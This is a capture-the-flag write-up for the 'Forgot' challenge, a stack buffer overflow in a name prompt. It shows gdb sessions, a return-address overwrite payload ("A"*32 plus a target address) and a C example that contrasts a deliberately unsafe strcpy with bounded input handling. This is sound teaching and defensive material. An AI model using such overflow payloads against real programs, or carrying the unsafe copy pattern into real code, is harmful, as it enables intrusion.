Backdoor CTF 2015!

We almost had the 500-point automation challenge as well! Damn it!
Here is the write-up for the 200-point question ‘Forgot’.

Question:

Fawkes has been playing around with Finite State Automaton lately. While exploring the concept of implementing regular expressions using FSA he thought of implementing an email-address validator.

Recently, Lua started to annoy Fawkes. To this, Fawkes challenged Lua to a battle of wits. Fawkes promised to reward Lua only if she manages to transition to a non-reachable state in the FSA he implemented. Find the flag in the binary provided to you.

Solution:

Firstly, since I am providing an offline solution, let us emulate the game server by creating a file called flag in the same directory as the binary (the program reads the flag from that file).

Let us run the file:

$:./forgot
What is your name?
> generic_name

Hi generic_name


			Finite-State Automaton

I have implemented a robust FSA to validate email addresses
Throw a string at me and I will let you know if it is a valid email address

				Cheers!

I should give you a pointer perhaps. Here: 8048654

Enter the string to be validate
> this is a random string
This all you got? I dont even see an @!

Okay, this was a little odd. The program first asks for our name and then for a string to validate. Judging by the error message, it expects an email address, and after poking around with the validation input I found that it indeed wants a valid email address.

But the vulnerability was not here. I tried overflowing the validation string input but went nowhere with it. Then I tried poking around with the earlier ‘name’ input.

$:./forgot
What is your name?
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Hi AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

			Finite-State Automaton

I have implemented a robust FSA to validate email addresses
Throw a string at me and I will let you know if it is a valid email address

				Cheers!

I should give you a pointer perhaps. Here: 8048654

Enter the string to be validate
> Segmentation fault (core dumped)

Segmentation fault! Yay! So we have a buffer overflow in the name input. I loaded the binary into Hopper Disassembler and found these strings:

0x08048d9f ./flag
0x08048da6 cat %s

The program references ./flag and cat %s, i.e. it contains code that opens the flag file and cats it. If we can jump to the address 0x80486cc, we execute the chain of instructions that prints the flag.

Hopper also shows that main is called just near the entry point. This is really helpful for us: if we can overwrite the program's saved return address with 0x80486cc, we are done.

Let us open the file in gdb.

I set two trivial breakpoints: one just before the program prints Hi!, and one after it has read the validation string. At the first one, before Hi! is printed, the stack frame already holds the saved return address and the other saved registers.

(gdb) break *0x80485dd
Breakpoint 1 at 0x80485dd
(gdb) break *0x8048602
Breakpoint 2 at 0x8048602

Now let us start the program.

(gdb) start
Function "main" not defined.
Make breakpoint pending on future shared library load? (y or [n]) y

Temporary breakpoint 3 (main) pending.
Starting program: /home/chinmay_dd/Desktop/Forgot/forgot
What is your name?
> generic_name

Breakpoint 1, 0x080485dd in ?? ()


Cool. Now let us analyze the stack.

(gdb) x/5w $ebp
0xffffccd8:	U""
0xffffccdc:	U"\xf7e1da83\001\xffffcd74\xffffcd7c\xf7feacea\001\xffffcd74\xffffcd14\x804b028\x80482b8\xf7fae000"
0xffffcd0c:	U""
0xffffcd10:	U""
0xffffcd14:	U"\x709a3512\x4cb77102"

We can see the return address at $ebp+0x4. Let us set it to where we want to go and see what happens.

(gdb) set {int}0xffffccdc = 0x80486cc

After inputting the string for validation, we get:

this_is_where_the_flag_will_be (contents of the file flag)

So we overflow the stack and send in "A"*32+p(0x80486CC)+"\n", and get the flag!
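To show the bug pattern behind this crash and what its fix looks like, here is an added C example. It is not code from the challenge binary: NAME_LEN mirrors the 32-byte name buffer the write-up observes ("Hi " echoes exactly 32 A's), the function names are mine, and the inputs are constructed. It places an unbounded copy into a fixed stack buffer next to a bounded copy that rejects overlong names and a prompt reader that drains and rejects overlong lines instead of letting them spill into the saved registers.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the challenge binary's code. NAME_LEN is an assumption
 * matching the 32 characters echoed back by "Hi " in the write-up. */
#define NAME_LEN 32

/* Vulnerable pattern: unbounded copy into a fixed stack buffer. Every byte
 * beyond NAME_LEN lands on whatever follows the buffer in the frame (saved
 * EBP, then the saved return address), which is why a long "name" first
 * segfaults and, with a chosen value in the return slot, changes where the
 * function returns to. Shown for contrast only; main() never calls it. */
void greet_unsafe(const char *input)
{
    char name[NAME_LEN];
    strcpy(name, input);            /* no length check: the bug */
    printf("Hi %s\n", name);
}

/* Number of bytes the unsafe copy would write past the buffer (terminating
 * NUL included); 0 means the input fits. */
size_t spill_bytes(const char *input)
{
    size_t needed = strlen(input) + 1;
    return needed > NAME_LEN ? needed - NAME_LEN : 0;
}

/* Hardened copy: refuse input that does not fit instead of truncating it
 * silently, so the caller can report the problem. memchr is used instead of
 * strnlen to stay within standard C. Returns 0 on success, -1 if rejected. */
int copy_name(char *dst, size_t dstsz, const char *input)
{
    const char *end = memchr(input, '\0', dstsz);
    if (end == NULL) {              /* no terminator within dstsz: too long */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, input, (size_t)(end - input) + 1);
    return 0;
}

/* Convenience wrapper: 1 if copy_name would accept input into a NAME_LEN
 * buffer, 0 otherwise. */
int name_accepted(const char *input)
{
    char name[NAME_LEN];
    return copy_name(name, sizeof name, input) == 0;
}

/* Hardened prompt: fgets bounds the read; a missing newline means the line
 * was longer than the buffer, so the remainder is discarded and the input
 * rejected rather than left for the next prompt. Returns 0 on success. */
int read_name(FILE *in, char *dst, size_t dstsz)
{
    if (fgets(dst, (int)dstsz, in) == NULL)
        return -1;
    char *nl = strchr(dst, '\n');
    if (nl == NULL) {
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;                       /* drain the overlong line */
        dst[0] = '\0';
        return -1;
    }
    *nl = '\0';
    return 0;
}

int main(void)
{
    char name[NAME_LEN];
    /* Constructed inputs: a 200-byte run of 'A' like the one in the
     * write-up, and a benign name. */
    char longname[201];
    memset(longname, 'A', 200);
    longname[200] = '\0';

    printf("200 A's would spill %zu bytes past the buffer\n", spill_bytes(longname));
    printf("copy_name(long) -> %d (rejected)\n", copy_name(name, sizeof name, longname));
    printf("copy_name(short) -> %d, Hi %s\n",
           copy_name(name, sizeof name, "generic_name"), name);
    return 0;
}
```

The important difference is not fgets versus strcpy by itself but that the hardened path treats an overlong name as an error it can see, instead of letting the excess bytes land silently on the saved frame pointer and return address.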